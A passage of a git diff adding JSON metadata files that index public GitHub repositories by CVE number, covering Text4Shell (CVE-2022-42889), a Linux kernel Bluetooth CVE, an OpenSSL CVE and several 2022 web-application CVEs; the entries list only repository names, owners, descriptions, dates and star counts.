"html_url": "https:\/\/github.com\/f0ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f0ng\/text4shellburpscanner", + "description": "text4shell(CVE-2022-42889) BurpSuite Scanner", + "fork": false, + "created_at": "2022-12-09T08:18:19Z", + "updated_at": "2024-02-09T17:49:38Z", + "pushed_at": "2022-12-09T09:08:13Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "burp", + "burp-extensions" + ], + "visibility": "public", + "forks": 0, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607430692, + "name": "text4shell-cve-2022-42889", + "full_name": "devenes\/text4shell-cve-2022-42889", + "owner": { + "login": "devenes", + "id": 66560757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66560757?v=4", + "html_url": "https:\/\/github.com\/devenes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devenes\/text4shell-cve-2022-42889", + "description": "Kubernetes Lab for CVE-2022-42889", + "fork": false, + "created_at": "2023-02-28T00:32:01Z", + "updated_at": "2024-10-04T16:17:52Z", + "pushed_at": "2023-02-28T11:43:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608352501, + "name": "text4shell", + "full_name": "hotblac\/text4shell", + "owner": { + "login": "hotblac", + "id": 4406140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4406140?v=4", + "html_url": "https:\/\/github.com\/hotblac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotblac\/text4shell", + "description": "A demonstration of CVE-2022-42889 (text4shell) remote code execution vulnerability", + "fork": false, + "created_at": "2023-03-01T20:56:37Z", + "updated_at": "2023-03-01T20:57:17Z", + "pushed_at": "2023-03-12T17:34:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 623655257, + "name": "CVE-2022-42889", + "full_name": "necroteddy\/CVE-2022-42889", + "owner": { + "login": "necroteddy", + "id": 37003131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4", + "html_url": "https:\/\/github.com\/necroteddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/necroteddy\/CVE-2022-42889", + "description": "docker for CVE-2022-42889", + "fork": false, + "created_at": "2023-04-04T20:08:08Z", + "updated_at": "2023-04-19T05:53:19Z", + "pushed_at": "2023-04-19T05:53:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625082348, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "ReachabilityOrg\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "ReachabilityOrg", + "id": 129769214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129769214?v=4", + "html_url": "https:\/\/github.com\/ReachabilityOrg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReachabilityOrg\/cve-2022-42889-text4shell-docker", + "description": null, + "fork": false, + "created_at": "2023-04-08T02:47:55Z", + "updated_at": "2023-04-08T02:48:07Z", + "pushed_at": "2023-04-11T15:43:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 625424909, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "dgor2023\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "dgor2023", + "id": 130265095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130265095?v=4", + "html_url": "https:\/\/github.com\/dgor2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgor2023\/cve-2022-42889-text4shell-docker", + "description": null, + "fork": false, + "created_at": "2023-04-09T04:09:34Z", + "updated_at": "2023-04-09T04:09:46Z", + "pushed_at": "2023-04-12T02:32:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 629556451, + "name": "cve-2022-42889-text4shell", + "full_name": "Dima2021\/cve-2022-42889-text4shell", + "owner": { + "login": "Dima2021", + "id": 61808880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61808880?v=4", + "html_url": "https:\/\/github.com\/Dima2021", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dima2021\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2023-04-18T14:49:45Z", + "updated_at": "2023-04-18T15:01:22Z", + "pushed_at": "2023-04-18T15:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643789911, + "name": "text4shell-docker", + "full_name": "aaronm-sysdig\/text4shell-docker", + "owner": { + "login": "aaronm-sysdig", + "id": 132866139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132866139?v=4", + "html_url": "https:\/\/github.com\/aaronm-sysdig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronm-sysdig\/text4shell-docker", + "description": "Dockerized POC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2023-05-22T06:57:55Z", + "updated_at": "2023-05-23T07:32:45Z", + "pushed_at": "2024-01-05T10:18:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 659148388, + "name": "CVE-2022-42889-Text4Shell-POC", + "full_name": "gustanini\/CVE-2022-42889-Text4Shell-POC", + "owner": { + "login": "gustanini", + "id": 47717581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47717581?v=4", + "html_url": "https:\/\/github.com\/gustanini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustanini\/CVE-2022-42889-Text4Shell-POC", + "description": "This repository contains a Python script to automate the process of testing for a vulnerability known as Text4Shell, referenced under the CVE id: CVE-2022-42889. ", + "fork": false, + "created_at": "2023-06-27T08:29:24Z", + "updated_at": "2024-10-15T16:19:30Z", + "pushed_at": "2023-06-27T09:01:14Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 687770707, + "name": "CVE-2022-42889", + "full_name": "Sic4rio\/CVE-2022-42889", + "owner": { + "login": "Sic4rio", + "id": 75425513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75425513?v=4", + "html_url": "https:\/\/github.com\/Sic4rio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sic4rio\/CVE-2022-42889", + "description": "Text4Shell", + "fork": false, + "created_at": "2023-09-06T01:13:26Z", + "updated_at": "2023-09-06T01:15:32Z", + "pushed_at": "2023-09-06T01:15:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689311131, + "name": "CVE-2022-42889", + "full_name": "34006133\/CVE-2022-42889", + "owner": { + "login": "34006133", + "id": 143711860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143711860?v=4", + "html_url": "https:\/\/github.com\/34006133", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34006133\/CVE-2022-42889", + "description": "RCE PoC for Apache Commons Text vuln", + "fork": false, + "created_at": "2023-09-09T12:11:36Z", + "updated_at": "2023-09-11T00:54:20Z", + "pushed_at": "2023-09-10T13:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 695246530, + "name": "cve-2022-42889-text4shell", + "full_name": "DimaMend\/cve-2022-42889-text4shell", + "owner": { + "login": "DimaMend", + "id": 145161091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145161091?v=4", + "html_url": "https:\/\/github.com\/DimaMend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimaMend\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2023-09-22T17:17:26Z", + "updated_at": "2023-09-22T17:17:44Z", + "pushed_at": "2024-11-23T14:18:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754828377, + "name": "cve-2022-42889-text4shell", + "full_name": "joshbnewton31080\/cve-2022-42889-text4shell", + "owner": { + "login": "joshbnewton31080", + "id": 88124465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88124465?v=4", + "html_url": "https:\/\/github.com\/joshbnewton31080", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joshbnewton31080\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2024-02-08T20:54:23Z", + "updated_at": "2024-02-08T20:54:36Z", + "pushed_at": "2024-02-08T20:54:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754828660, + "name": "cve-2022-42889-text4shell", + "full_name": "MendDemo-josh\/cve-2022-42889-text4shell", + "owner": { + "login": "MendDemo-josh", + "id": 109741065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109741065?v=4", + "html_url": "https:\/\/github.com\/MendDemo-josh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MendDemo-josh\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2024-02-08T20:55:09Z", + "updated_at": "2024-02-08T20:55:23Z", + "pushed_at": "2024-02-09T13:48:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42896.json b/2022/CVE-2022-42896.json new file mode 100644 index 0000000000..4fe01556b4 --- /dev/null +++ b/2022/CVE-2022-42896.json @@ -0,0 +1,157 @@ +[ + { + "id": 623797649, + "name": "linux-4.19.72_CVE-2022-42896", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2022-42896", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-05T05:33:09Z", + "updated_at": "2023-04-05T06:24:18Z", + "pushed_at": "2023-04-05T05:36:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623842429, + "name": "kernel_v4.19.72_CVE-2022-42896_old", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old", + "description": null, + "fork": false, + "created_at": "2023-04-05T07:51:32Z", + "updated_at": "2023-04-06T05:17:04Z", + "pushed_at": "2023-04-06T11:21:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623871240, + "name": "linux-4.19.72_CVE-2022-42896", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-42896", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-05T09:10:38Z", + "updated_at": "2023-04-05T09:17:08Z", + "pushed_at": "2023-04-05T10:40:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624412266, + "name": "kernel_v4.19.72_CVE-2022-42896_new", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new", + "description": null, + "fork": false, + "created_at": "2023-04-06T12:12:27Z", + "updated_at": "2023-04-06T12:24:04Z", + "pushed_at": "2023-04-07T06:18:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624531158, + "name": "kernel_v4.19.72_CVE-2022-42896", + "full_name": "himanshu667\/kernel_v4.19.72_CVE-2022-42896", + "owner": { + "login": "himanshu667", + "id": 130066224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130066224?v=4", + "html_url": "https:\/\/github.com\/himanshu667", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/himanshu667\/kernel_v4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-06T17:17:25Z", + "updated_at": "2023-04-06T17:17:25Z", + "pushed_at": "2023-04-06T17:17:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42899.json b/2022/CVE-2022-42899.json new file mode 100644 index 0000000000..60c7350250 --- /dev/null +++ b/2022/CVE-2022-42899.json @@ -0,0 +1,33 @@ +[ + { + "id": 553939981, + "name": "CVE-2022-42899", + "full_name": "iamsanjay\/CVE-2022-42899", + "owner": { + "login": "iamsanjay", + "id": 6595915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6595915?v=4", + "html_url": "https:\/\/github.com\/iamsanjay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iamsanjay\/CVE-2022-42899", + "description": null, + "fork": false, + "created_at": "2022-10-19T02:13:25Z", + "updated_at": "2023-02-14T14:38:11Z", + "pushed_at": "2022-10-19T02:27:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4304.json b/2022/CVE-2022-4304.json new file mode 100644 index 0000000000..108580a021 --- /dev/null +++ b/2022/CVE-2022-4304.json @@ -0,0 +1,33 @@ +[ + { + "id": 631842494, + "name": "Openssl-1.1.1g_CVE-2022-4304", + "full_name": "Trinadh465\/Openssl-1.1.1g_CVE-2022-4304", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/Openssl-1.1.1g_CVE-2022-4304", + "description": null, + "fork": false, + "created_at": "2023-04-24T07:15:33Z", + "updated_at": "2023-04-24T07:18:06Z", + "pushed_at": "2023-04-24T07:18:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43096.json b/2022/CVE-2022-43096.json new file mode 100644 index 0000000000..8eec1ffd16 --- /dev/null +++ b/2022/CVE-2022-43096.json @@ -0,0 +1,33 @@ +[ + { + "id": 567187197, + "name": "Mediatrix-CVE-2022-43096", + "full_name": "ProxyStaffy\/Mediatrix-CVE-2022-43096", + "owner": { + "login": "ProxyStaffy", + "id": 113522001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113522001?v=4", + "html_url": "https:\/\/github.com\/ProxyStaffy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyStaffy\/Mediatrix-CVE-2022-43096", + "description": null, + "fork": false, + "created_at": "2022-11-17T09:00:52Z", + "updated_at": "2022-11-18T01:18:44Z", + "pushed_at": "2022-11-17T09:06:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43097.json b/2022/CVE-2022-43097.json new file mode 100644 index 0000000000..38484b65b5 --- /dev/null +++ b/2022/CVE-2022-43097.json @@ -0,0 +1,33 @@ +[ + { + "id": 573969775, + "name": "CVE-2022-43097", + "full_name": "nibin-m\/CVE-2022-43097", + "owner": { + "login": "nibin-m", + "id": 22180125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22180125?v=4", + "html_url": "https:\/\/github.com\/nibin-m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nibin-m\/CVE-2022-43097", + "description": "All details about CVE-2022-43097", + "fork": false, + "created_at": "2022-12-04T01:59:51Z", + "updated_at": "2022-12-18T10:11:10Z", + "pushed_at": "2022-12-04T02:07:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43117.json b/2022/CVE-2022-43117.json new file mode 100644 index 0000000000..8d73195404 --- /dev/null +++ b/2022/CVE-2022-43117.json @@ -0,0 +1,33 @@ +[ + { + "id": 568387385, + "name": "CVE-2022-43117", + "full_name": "RashidKhanPathan\/CVE-2022-43117", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-43117", + "description": null, + "fork": false, + "created_at": "2022-11-20T11:33:46Z", + "updated_at": "2022-11-20T11:33:46Z", + "pushed_at": "2022-11-20T11:34:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43143.json b/2022/CVE-2022-43143.json new file mode 100644 index 0000000000..02498e72af --- /dev/null +++ b/2022/CVE-2022-43143.json @@ -0,0 +1,33 @@ +[ + { + "id": 547276106, + "name": "beekeeper", + "full_name": "goseungduk\/beekeeper", + "owner": { + "login": "goseungduk", + "id": 42366390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366390?v=4", + "html_url": "https:\/\/github.com\/goseungduk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/goseungduk\/beekeeper", + "description": "CVE-2022-43143 PoC", + "fork": false, + "created_at": "2022-10-07T12:19:45Z", + "updated_at": "2023-01-06T06:03:19Z", + "pushed_at": "2022-10-07T12:20:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43144.json b/2022/CVE-2022-43144.json new file mode 100644 index 0000000000..09a533f217 --- /dev/null +++ b/2022/CVE-2022-43144.json @@ -0,0 +1,33 @@ +[ + { + "id": 562258335, + "name": "CVE-2022-43144-Stored-XSS", + "full_name": "mudassiruddin\/CVE-2022-43144-Stored-XSS", + "owner": { + "login": "mudassiruddin", + "id": 22985192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22985192?v=4", + "html_url": "https:\/\/github.com\/mudassiruddin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mudassiruddin\/CVE-2022-43144-Stored-XSS", + "description": "PoC to exploit CVE-2022-43144", + "fork": false, + "created_at": "2022-11-05T19:30:41Z", + "updated_at": "2024-08-12T20:28:12Z", + "pushed_at": "2022-11-06T00:55:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43271.json b/2022/CVE-2022-43271.json new file mode 100644 index 0000000000..efe701c3f2 --- /dev/null +++ b/2022/CVE-2022-43271.json @@ -0,0 +1,33 @@ +[ + { + "id": 580247521, + "name": "CVE-2022-43271", + "full_name": "SecurityWillCheck\/CVE-2022-43271", + "owner": { + "login": "SecurityWillCheck", + "id": 88411151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88411151?v=4", + "html_url": "https:\/\/github.com\/SecurityWillCheck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecurityWillCheck\/CVE-2022-43271", + "description": null, + "fork": false, + "created_at": "2022-12-20T04:40:29Z", + "updated_at": "2022-12-21T00:19:14Z", + "pushed_at": "2022-12-20T05:11:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43293.json b/2022/CVE-2022-43293.json new file mode 100644 index 0000000000..910608259a --- /dev/null +++ b/2022/CVE-2022-43293.json @@ -0,0 +1,54 @@ +[ + { + "id": 624878736, + "name": "CVE-2022-43293", + "full_name": "LucaBarile\/CVE-2022-43293", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2022-43293", + "description": "Exploit and report for CVE-2022-43293", + "fork": false, + "created_at": "2023-04-07T13:38:27Z", + "updated_at": "2023-04-07T16:47:13Z", + "pushed_at": "2023-04-07T15:12:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-overwrite", + "arbitrary-file-write", + "cng-sys", + "denial-of-service", + "disclosure", + "exploit", + "impersonation", + "link-following", + "link-following-attack", + "mount-point", + "poc", + "proof-of-concept", + "symbolic-link", + "vulnerability", + "wacom", + "wacom-vulnerability", + "windows-denial-of-service", + "write-up", + "zero-day" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43332.json b/2022/CVE-2022-43332.json new file mode 100644 index 0000000000..57d1f01d17 --- /dev/null +++ b/2022/CVE-2022-43332.json @@ -0,0 +1,33 @@ +[ + { + "id": 564247324, + "name": "CVE-2022-43332", + "full_name": "maikroservice\/CVE-2022-43332", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-43332", + "description": "Cross Site Scripting in WonderCMS v3.3.4", + "fork": false, + "created_at": "2022-11-10T10:06:14Z", + "updated_at": "2022-11-12T11:37:02Z", + "pushed_at": "2022-11-10T19:13:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43343.json b/2022/CVE-2022-43343.json new file mode 100644 index 0000000000..d63846328e --- /dev/null +++ b/2022/CVE-2022-43343.json @@ -0,0 +1,33 @@ +[ + { + "id": 595861738, + "name": "CVE-2022-43343", + "full_name": "Halcy0nic\/CVE-2022-43343", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-43343", + "description": "Proof of concept for (CVE-2022-43343)", + "fork": false, + "created_at": "2023-02-01T00:33:57Z", + "updated_at": "2024-07-02T20:34:09Z", + "pushed_at": "2023-02-01T00:54:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43369.json b/2022/CVE-2022-43369.json new file mode 100644 index 0000000000..cfe724ef6e --- /dev/null +++ b/2022/CVE-2022-43369.json @@ -0,0 +1,33 @@ +[ + { + "id": 572050236, + "name": "CVE-2022-43369", + "full_name": "sudoninja-noob\/CVE-2022-43369", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-43369", + "description": null, + "fork": false, + "created_at": "2022-11-29T12:58:59Z", + "updated_at": "2022-11-30T06:11:36Z", + "pushed_at": "2022-11-29T13:00:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43571.json b/2022/CVE-2022-43571.json new file mode 100644 index 0000000000..4fed478936 --- /dev/null +++ b/2022/CVE-2022-43571.json @@ -0,0 +1,33 @@ +[ + { + "id": 582561156, + "name": "CVE-2022-43571", + "full_name": "ohnonoyesyes\/CVE-2022-43571", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": 